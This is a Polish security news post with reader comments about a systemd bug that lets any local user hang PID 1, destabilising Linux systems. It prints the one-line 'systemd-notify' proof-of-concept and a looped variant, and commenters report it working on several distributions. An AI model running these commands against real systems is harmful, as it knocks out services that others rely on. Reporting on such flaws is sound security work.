Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
DoS na Linuksa jednym poleceniem z dowolnego użytkownika? – podatność w systemd
W lekkie panice załatano właśnie błąd w systemd, jeden z najistotniejszych składników wielu Linuksów, posiadający PID=1. Wg autora znaleziska, z dowolnego użytkownika wystarczy wpisać:
NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
system przestaje być stabilny, niektórzy raportują też problemy z rebootem:
After running this command, PID 1 is hung in the
pausesystem call. You can no longer start and stop daemons. inetd-style services no longer accept connections. You cannot cleanly reboot the system. The system feels generally unstable (e.g. ssh and su hang for 30 seconds since systemd is now integrated with the login system).
Niektórzy też sugerują wykonanie całości w pętli:
Okay, I managed to trigger this on v229 by changing the PoC to the following:
while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify „”; done
Pamiętajcie żeby nie testować polecenia na systemach, których nie jesteście właścicielami.
Błąd występował od dwóch lat, a fix był wyjątkowo prosty.
Całość błędu nie została niestety zgłoszona w trybie responsible disclosure, a analiza potencjalnych skutków (vs np. wykorzystywana wersja systemd) cały czas trwa. Dystrybucje jeszcze nie udostępniły patcha (ani komentarza).
–ms
Nie odlaleziono polecenia 'systemd-notify’
apt-get install systemd-notify ^^
W Slackware też to zadziała?
O, systemd właśnie zaczął gryźć w d.pę. I dobrze. To g.no dawno powinno wylecieć z każdego normalnego uniksowego systemu.
Prawda to… Na szczęście są jeszcze dystrybucje bez tego syfu. ;)
W przypadku VirtualBoxa padają wszystkie maszyny aktualnie uruchomione, a sam VirtualBox przestaje odpowiadać.
Testowałem na Ubuntu Server z następującym efektem:
systemd się zatrzymuje, nie można resetować usług, bo resecie wszystko wraca do normy
Na archu działa ;)